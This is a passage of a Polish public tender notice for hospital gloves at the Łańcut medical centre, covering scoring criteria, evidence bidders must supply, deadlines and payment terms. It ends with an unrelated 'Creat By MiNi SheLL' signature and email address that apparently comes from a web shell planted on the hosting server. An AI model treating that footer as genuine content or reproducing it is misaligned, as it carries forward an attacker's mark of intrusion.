<h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena Jakościowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET III – RĘKAWICE NR 3 <br/>Pakiet składa się z pozycji:<br/>Pozycja nr 1 – RĘKAWICE DIAGNOSTYCZNE; NIEJAŁOWE, NITRYLOWE BEZPUDROWE (załącznik nr 4)<br/>Pozycja nr 2 – RĘKAWICE WINYLOWE; NIEJAŁOWE, PUDROWANE (załącznik nr 4.1)<br/>Pozycja nr 3 – RĘKAWICE WINYLOWE; NIEJAŁOWE, BEZPUDROWE (załącznik nr 4.2) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141420-0 - Rękawice chirurgiczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu Zamawiający będzie stosował niżej podane kryteria:<br/>Cena 60%<br/>Ocena Jakościowa 30%<br/>Termin dostawy 10 %<br/>Ocena będzie dokonywana według skali punktowej, przy założeniu, że maksymalna punktacja wynosi 100 punktów.<br/>a) Cena za realizację przedmiotu zamówienia (C) zostanie wyliczona w sposób matematyczny według następującego wzoru:<br/><br/>a)	Cena za realizację przedmiotu zamówienia (C) zostanie wyliczona w sposób matematyczny według następującego wzoru:<br/> Najniższa oferowana cena <br/>C = --------------------------------------------------------------------- x 100 x waga kryterium (60%)<br/> Cena oferty badanej<br/><br/>Jednostka miary tego kryterium – PLN<br/><br/>Cena (brutto) za poszczególną pozycję musi uwzględniać wszelkie koszty, jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>b)	Ocena Jakościowa – ocena zostanie dokonana indywidualnie na przez każdego członka Komisji przetargowej na podstawie dostarczonych próbek rękawic medycznych, złożonych dokumentów „zestawienie wymaganych parametrów technicznych” oraz załączonych dokumentów (środków dowodowych) przez Wykonawcę, Zamawiający będzie dokonywał oceny jakościowej załącznik nr 7 na drukach „formularz oceny jakościowej” zawartych w załącznikach nr 2AA, 2.1AA, 3AA, 3.1AA, 4AA, 4.1AA, 4.2AA, 5AA, 5.1AA w zależności od numeru Pakietu i pozycji.<br/><br/>Ocena jakościowa nastąpi wg następującego wzoru dla Pakietów I, II, III, IV:<br/> <br/> Suma punktów przyznanych przez<br/> członków komisji przetargowej ……. pkt. <br/> OJCK = ------------------------------------------------------------------------- x 100 x waga kryterium (30%)<br/> Maksymalna suma punktów <br/><br/>Punkty za Ocenę Jakościową: skala punktowa 0 – 100 pkt., waga 30%<br/><br/><br/>c)	Termin dostawy (TD): <br/><br/>Każda oferta w kryterium termin dostawy (TD) otrzyma następującą ilość punktów: <br/>1)	za dwa dni robocze 100 pkt.<br/>2)	za trzy dni robocze 75 pkt.<br/>3)	za cztery dni robocze 50 pkt.<br/>4)	za pięć dni roboczych 25 pkt.<br/><br/>Jednostka miary tego kryterium – pełne dni robocze <br/><br/>Otrzymane punkty w tym kryterium zostaną pomnożone przez wagę kryterium (10 %).<br/><br/>Oferty z krótszym niż 2 – dniowym terminem dostawy oraz dłuższym niż 5 – dniowym terminem dostawy oraz oferty w których Wykonawcy nie wpiszą terminu dostawy zostaną odrzucone i nie będą podlegać ocenie ofert pod względem przyjętych kryteriów oceny ofert. <br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. <br/> <br/>Realizacja zamówienia w poszczególnym pakiecie zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena Jakościowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET IV – RĘKAWICE NR 4 <br/>Pakiet składa się z pozycji:<br/>Pozycja nr 1 – RĘKAWICE SEKCYJNE; NIEJAŁOWE (załącznik nr 5)<br/>Pozycja nr 2 – RĘKAWICE OCHRONNE DO CENTRALNEJ STERYLIZATORNI (załącznik nr 5.1) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141420-0 - Rękawice chirurgiczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu Zamawiający będzie stosował niżej podane kryteria:<br/>Cena 60%<br/>Ocena Jakościowa 30%<br/>Termin dostawy 10 %<br/>Ocena będzie dokonywana według skali punktowej, przy założeniu, że maksymalna punktacja wynosi 100 punktów.<br/>a) Cena za realizację przedmiotu zamówienia (C) zostanie wyliczona w sposób matematyczny według następującego wzoru:<br/><br/>a)	Cena za realizację przedmiotu zamówienia (C) zostanie wyliczona w sposób matematyczny według następującego wzoru:<br/> Najniższa oferowana cena <br/>C = --------------------------------------------------------------------- x 100 x waga kryterium (60%)<br/> Cena oferty badanej<br/><br/>Jednostka miary tego kryterium – PLN<br/><br/>Cena (brutto) za poszczególną pozycję musi uwzględniać wszelkie koszty, jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>b)	Ocena Jakościowa – ocena zostanie dokonana indywidualnie na przez każdego członka Komisji przetargowej na podstawie dostarczonych próbek rękawic medycznych, złożonych dokumentów „zestawienie wymaganych parametrów technicznych” oraz załączonych dokumentów (środków dowodowych) przez Wykonawcę, Zamawiający będzie dokonywał oceny jakościowej załącznik nr 7 na drukach „formularz oceny jakościowej” zawartych w załącznikach nr 2AA, 2.1AA, 3AA, 3.1AA, 4AA, 4.1AA, 4.2AA, 5AA, 5.1AA w zależności od numeru Pakietu i pozycji.<br/><br/>Ocena jakościowa nastąpi wg następującego wzoru dla Pakietów I, II, III, IV:<br/> <br/> Suma punktów przyznanych przez<br/> członków komisji przetargowej ……. pkt. <br/> OJCK = ------------------------------------------------------------------------- x 100 x waga kryterium (30%)<br/> Maksymalna suma punktów <br/><br/>Punkty za Ocenę Jakościową: skala punktowa 0 – 100 pkt., waga 30%<br/><br/><br/>c)	Termin dostawy (TD): <br/><br/>Każda oferta w kryterium termin dostawy (TD) otrzyma następującą ilość punktów: <br/>1)	za dwa dni robocze 100 pkt.<br/>2)	za trzy dni robocze 75 pkt.<br/>3)	za cztery dni robocze 50 pkt.<br/>4)	za pięć dni roboczych 25 pkt.<br/><br/>Jednostka miary tego kryterium – pełne dni robocze <br/><br/>Otrzymane punkty w tym kryterium zostaną pomnożone przez wagę kryterium (10 %).<br/><br/>Oferty z krótszym niż 2 – dniowym terminem dostawy oraz dłuższym niż 5 – dniowym terminem dostawy oraz oferty w których Wykonawcy nie wpiszą terminu dostawy zostaną odrzucone i nie będą podlegać ocenie ofert pod względem przyjętych kryteriów oceny ofert. <br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. <br/> <br/>Realizacja zamówienia w poszczególnym pakiecie zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena Jakościowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 57 oraz art. 112 ust. 2 Ustawy Pzp, tj.:<br/>1.1.nie podlegają wykluczeniu;<br/>nie podlegają wykluczeniu (Załącznik Nr 8A);<br/>Art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 roku – o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (załącznik nr 9):<br/>1.2.spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia szczegółowego warunku w tym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia szczegółowego warunku w tym zakresie,<br/>3) sytuacji ekonomicznej lub finansowej – Zamawiający nie stawia szczegółowego warunku w tym zakresie,<br/>4) zdolności technicznej lub zawodowej – Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>W zakresie spełniania powyższych warunków należy przedstawić oświadczenie (Załącznik Nr 8B). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1W zakresie potwierdzenia braku podstaw do wykluczenia z Postępowania<br/>w okolicznościach, o których mowa w art. 108 ust. 1 ustawy Pzp Wykonawca zobowiązany jest przedłożyć oświadczenie o braku podstaw do wykluczenia<br/>z postępowania – wypełnione i podpisane odpowiednio przez osobę (osoby) upoważnioną (upoważnione) do reprezentowania Wykonawcy. Stosowne oświadczenie zawarte jest we wzorze formularza ofertowego, stanowiącego Załącznik Nr 8A do Specyfikacji.<br/>Art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 roku – o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (załącznik nr 9):</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 273 Ustawy Prawo zamówień publicznych, Wykonawca zobowiązany<br/>jest przedłożyć oświadczenie o spełnianiu warunków udziału<br/>w postępowaniu – wypełnione i podpisane odpowiednio przez osobę (osoby) upoważnioną (upoważnione) do reprezentowania Wykonawcy. Stosowne oświadczenie zawarte jest we wzorze formularza ofertowego, stanowiącego Załącznik Nr 8B do Specyfikacji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe<br/>Zamawiający wraz z ofertą żąda przedłożenia:<br/>1.Karta produktu potwierdzająca spełnienie wymaganych parametrów technicznych – dotyczy wszystkich Pakietów – dokumenty mają potwierdzać wymogi opisane w Załącznikach Nr 2÷5 i załączniku 6 do SWZ) – Załącznik Nr 10 do oferty.<br/>2.Deklaracja zgodności CE wystawiona przez wytwórcę w obszarze wyrobów medycznych – wymagana prawem dotyczy wszystkich Pakietów – Załącznik Nr 11 do oferty.<br/>3.Certyfikat jednostki notyfikowanej w obszarze wyrobów medycznych – wymagane prawem - dotyczy Pakiet I i Pakiet II – – Załącznik Nr 12 do oferty.<br/>4.Deklaracja zgodności CE na wyrób ochronny lub certyfikat typu UE (kategoria III) - dotyczy Pakiet III i Pakiet IV– Załącznik Nr 13 do oferty.<br/>5.Badania wystawione przez jednostkę niezależną potwierdzające odporność na przenikanie wirusów wg normy ASTM F1671 lub równoważnej – Pakiet I, Pakiet II, Pakiet III pozycja nr 1, i Pakiet IV – Załącznik Nr 14 do oferty.<br/>6.Badania wystawione przez jednostkę niezależną potwierdzające odporność na przenikanie krwi syntetycznej wg normy ASTM F1670 lub równoważnej – Pakiet I, Pakiet II, Pakiet III pozycja nr 1, (jeżeli dotyczy)– Załącznik Nr 15 do oferty.<br/>7.Badania wystawione przez jednostkę niezależną potwierdzające odporność min. 60 minut na przenikanie 70% izopropanolu wg normy EN 374-3 lub EN 16523 lub równoważnej – Pakiet III pozycja nr 1 (jeśli dotyczy) – Załącznik Nr 16 do oferty.<br/>8.Dokument potwierdzający dopuszczenie do kontaktu z żywnością – Pakiet III pozycja nr 1 – Załącznik Nr 17 do oferty.<br/>9.Próbki oferowanych rękawic medycznych do oceny jakościowej – Wykonawca zobowiązany jest do złożenia próbek w ilości i warunki określono w rozdziale XVI pkt I w ppkt 9 w SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dokumenty podlegające uzupełnieniu:<br/>1.Karta produktu potwierdzająca spełnienie wymaganych parametrów technicznych – dotyczy wszystkich Pakietów – dokumenty mają potwierdzać wymogi opisane w Załącznikach Nr 2÷5 i załączniku 6 do SWZ) – Załącznik Nr 10 do oferty.<br/>2.Deklaracja zgodności CE wystawiona przez wytwórcę w obszarze wyrobów medycznych – wymagana prawem dotyczy wszystkich Pakietów – Załącznik Nr 11 do oferty.<br/>3.Certyfikat jednostki notyfikowanej w obszarze wyrobów medycznych – wymagane prawem - dotyczy Pakiet I i Pakiet II – – Załącznik Nr 12 do oferty.<br/>4.Deklaracja zgodności CE na wyrób ochronny lub certyfikat typu UE (kategoria III) - dotyczy Pakiet III i Pakiet IV– Załącznik Nr 13 do oferty.<br/>5.Badania wystawione przez jednostkę niezależną potwierdzające odporność na przenikanie wirusów wg normy ASTM F1671 lub równoważnej – Pakiet I, Pakiet II, Pakiet III pozycja nr 1, i Pakiet IV – Załącznik Nr 14 do oferty.<br/>6.Badania wystawione przez jednostkę niezależną potwierdzające odporność na przenikanie krwi syntetycznej wg normy ASTM F1670 lub równoważnej – Pakiet I, Pakiet II, Pakiet III pozycja nr 1, (jeżeli dotyczy)– Załącznik Nr 15 do oferty.<br/>7.Badania wystawione przez jednostkę niezależną potwierdzające odporność min. 60 minut na przenikanie 70% izopropanolu wg normy EN 374-3 lub EN 16523 lub równoważnej – Pakiet III pozycja nr 1 (jeśli dotyczy) – Załącznik Nr 16 do oferty.<br/>8.Dokument potwierdzający dopuszczenie do kontaktu z żywnością – Pakiet III pozycja nr 1 – Załącznik Nr 17 do oferty.<br/>9.Próbki nie podlegają uzupełnieniu <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I Inne dokumenty, które należy złożyć wraz z ofertą, nie wymienione w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 roku w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz.U. z 2020 r., poz. 2415):<br/>1.Formularz ofertowy sporządzony, według wzoru określonego w Załączniku Nr 1 do Specyfikacji i podpisany przez Wykonawcę.<br/>2.Formularze asortymentowo – cenowe, według wzorów określonych w Załącznikach Nr 2÷5.<br/>Do oferty należy dołączyć tylko te formularze asortymentowo – cenowe, na które Wykonawca składa ofertę.<br/>3.Zestawienie wymaganych parametrów technicznych (załącznik nr 6), według wzorów określonych w załącznikach Nr 2A÷5A. <br/>Do oferty należy dołączyć tylko te zestawienia wymaganych parametrów technicznych, na które Wykonawca składa ofertę.<br/>UWAGA! W przypadku nie dołączenia do oferty Załącznika Nr 1, Załącznika/ów Nr 2÷5 i Załącznika nr 6, Zamawiający odrzuci ofertę Wykonawcy.<br/>II Inne wymagane dokumenty:<br/>1.W przypadku Wykonawców działających przez pełnomocnika – pełnomocnictwo.<br/>2.W przypadku Wykonawców wspólnie ubiegających się o zamówienie – dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z opisem zawartym w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia został opisany w projektowanych postanowieniach umowy w paragrafie 7 w (załączniku 10 ) do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Centrum Medyczne w Łańcucie Sp. z o. o. https://cm-lancut.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagany termin wykonania przedmiotu zamówienia (umowy) i warunki realizacji zamówienia:<br/>1.Dostawy przedmiotu zamówienia odbywać się będą sukcesywnie, stosownie do potrzeb<br/>Zamawiającego zgodnie z formularzami asortymentowo – cenowymi w formie dostaw cząstkowych.<br/>2.Termin wykonania przedmiotu zamówienia (umowy) odbywać się będzie przez minimalny 21<br/>miesięczny okres od daty zawarcia umowy lub do wyczerpania kwoty stanowiącej wynagrodzenie<br/>umowne.<br/>3.Dostawy przedmiotu zamówienia odbywać się będą w dni robocze w godzinach od 7.00 do 14.00<br/>według pisemnych zamówień składanych drogą mailową przez Kierownika Apteki Szpitalnej lub innej upoważnionej osoby. W bardzo pilnych i uzasadnionych przypadkach zamówienia mogą być składane w formie telefonicznej. <br/>4.W związku z zaistniałymi różnymi sytuacjami np. stanami nadzwyczajnymi, epidemii itp. mających wpływ na realizację przedmiotu zamówienia przyszłych umów, jak również w przypadku niewyczerpania asortymentu Zamawiający dopuszcza przedłużenie czasu realizacji przedmiotu zamówienia na okres nie dłuższy niż 6 miesięcy lub do wyczerpania asortymentu.<br/>5.Minimalny termin dostawy przedmiotu zamówienia to dwa dni robocze, natomiast maksymalny<br/>termin dostawy to pięć dni roboczych od daty złożenia zamówienia.<br/>6.Termin dostawy liczony jest w następnym dniu roboczym od dnia złożenia zamówienia przez<br/>Zamawiającego.<br/>7.Zamawiający ustala, że dniami roboczymi są to dni od poniedziałku do piątku w godzinach<br/>od 7.00 do 14.00 z wyłączeniem sobót i niedziel oraz określonych ustawą świąt.<br/><br/>Termin, forma płatności:<br/>1.Termin płatności – płatność za realizację cząstkową, tj. za dostawę przedmiotu zamówienia będzie<br/>dokonywana przelewem terminie do 30 dni po dostawie i otrzymaniu prawidłowo wystawionej<br/>faktury VAT.<br/>2.Forma płatności – przelew.<br/>3.W przypadku, gdy termin płatności przypadnie w dzień ustawowo wolny od pracy lub sobotę, płatność nastąpi w terminie pierwszego dnia roboczego następującego po tych dniach.<br/>4.Zamawiający dopuszcza przesyłanie faktur w formie elektronicznej na adres: apteka@cm-lancut.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com